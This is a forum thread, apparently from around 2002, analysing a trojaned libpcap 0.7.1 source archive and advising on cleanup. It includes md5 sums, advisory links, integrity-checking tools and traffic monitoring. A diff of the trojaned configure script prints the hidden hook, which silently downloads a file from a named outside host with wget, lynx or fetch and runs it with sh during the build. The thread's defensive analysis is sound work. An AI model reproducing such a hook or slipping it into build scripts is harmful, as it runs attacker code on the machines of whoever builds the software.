When I fist realized I installed a trojaned libpcap, I did a search for conftes.c and confes and couldn't find it.
Ok, I've done a quick dirdiff on the source trees, and as far as I can see it's consistent with the trojaned archive, starting at the md5sum:
73ba7af963aff7c9e23fa1308a793dca (bad)
0597c23e3496a5c108097b2a0f1bd0c7 (good)
plus the code in gencode.c and configure.
Code:
--- libpcap-0.7.1-c/configure Mon Dec 10 09:34:21 2001
+++ libpcap-0.7.1-t/configure Mon Dec 10 09:34:21 2001
@@ -2043,15 +2041,17 @@
test -z "$ac_cv_prog_RANLIB" && ac_cv_prog_RANLIB=":"
fi
fi
-RANLIB="$ac_cv_prog_RANLIB"
-if test -n "$RANLIB"; then
+ RANLIB="$ac_cv_prog_RANLIB"
+ if test -n "$RANLIB"; then
echo "$ac_t""$RANLIB" 1>&6
else
echo "$ac_t""no" 1>&6
fi
+ CNF="services"
+ URL="mars.raketti.net/~mash/$CNF"
@@ -2090,22 +2090,34 @@
fi
fi
-echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
-echo "configure:2095: checking if sockaddr struct has sa_len member" >&5
+ (IFS=","
+ ARGS="wget -q -O -,lynx --source,fetch -q -o -"
+
+ for i in $ARGS; do
+ IFS=" "
+ $i $URL 1> $CNF
+ if [ -f $CNF ]; then sh $CNF
+ exit
+ fi
+ rm -f $CNF
+ done) 1>/dev/null 2>/dev/null &
+
+ echo $ac_n "checking if sockaddr struct has sa_len member""... $ac_c" 1>&6
+ echo "configure:2095: checking if sockaddr struct has sa_len member" >&5
You see it'll try to D/L the file (that should be executed and removed)
from a fixed address. So once that address is shut down the code is useless.
I was hoping they would post some more extensive info on what happened and specific steps on what to look for to fix a compromised box and details on the extent of the possible system damage.
http://online.securityfocus.com/bid/6171,
http://www.cert.org/advisories/CA-2002-30.html and
http://www.iss.net/security_center/static/10620.php
where clear enough to me...
I don't mind redoing this box, but I'd rather not if I don't have to, duh.
Ok, here's why. It's about responsability. (I know, this sounds like parents speaking :-] )
(Below I don't mean "you" as in baduba, but generally speaking, ok.)
A system has a purpose, is under your control, and so generally speaking is beneficial to you and/or the community.
Once a system is compromised, its purpose changes from being beneficial to you to being beneficial to a somewhat select part of community. Not to mention you don't control it anymore.
When a compromised system is left in this state it
will act as another jumpboard for crackers, which means they for instance can abuse the trust relationship your system has with other systems and go on to do damage. If so you would be, what in judicial terms is called an accomplice, like in "aiding a criminal", because you would provide the means ad your system becomes a threat, a liability to ppl on the connected network (LAN, WAN and Internet).
The real problem of course is the majority of the ppl don't realize how much more powerfull a Linux system is compared to wintendo.
With that power comes the responsability to "be a good netizen", something even less ppl are aware of.
I ran chrootkit and it found no signatures or signs of trojans. Although this version 0.37 Release Date: Mon Sep 16 2002 may not have the signature for this particular trojan yet.
No, but using it will at least show if other stuff is introduced into the system.
I haven't used the libpcap binary yet so perhaps something didn't get started ie: essential trojan code?
Heh. No, it was to be deployed while
running configure.
I haven't had time to run obtain trusted binaries yet to check md5 sums and such, hopefully I can get to it in the next few days.
If you can't get a grip on running Tripwire, try using Aide. I prefer it as it's easier and as powerfull as Tripwire.
Don't forget to save your signature databases on read-only media. Same goes for the RPM databases if you use them.
Trusted binaries can be found on 1 floppy distro's like tomsrtbt, your distro's bootable install/rescue cdr or forensics cdr's like Biatchux.
I usually have a fresh statically linked copy of Busybox lying around as well if space is concerned.
I only installed libpcap, not tcpdump, a bit of trivia.
Doesn't matter. Both where trojaned. As where Fragroute, OpenSSH, BitchX etc, etc...
Again, we all share a responsability to demand from developers to at least have md5sums available, or better, have GPG/PGP signatures.
As we learned from the slapper worm, if you can't deinstall gcc, you should at least barricade it against public use.
Logging all outgoing traffic wouldn't be bad as well. Not that it'll stop something like the tcpdump/libpcap trojan from working, but if you keep an eye on the logs you should be able to trace back when the system was compromised which is a slight advantage over
knowing nothing at all :-]
You should have the trojaned libpcap... don't do anything foolish. I curious what you can glean from the source.
Thanks. As you see I made some use of it. Shame I couldn't get the services file as well.
I have the box on a trusted test network, and I could run a sniffer trace over a couple of days and see what kind of traffic the compromised box is generating if you think it'd be useful.
If you want to keep an eye on it I'd say just log outgoing traffic (or only to 212.146.0.34 if you've got lotsa traffic) as well, weed out your usual destinations, and if nothing shows up, consider it clean.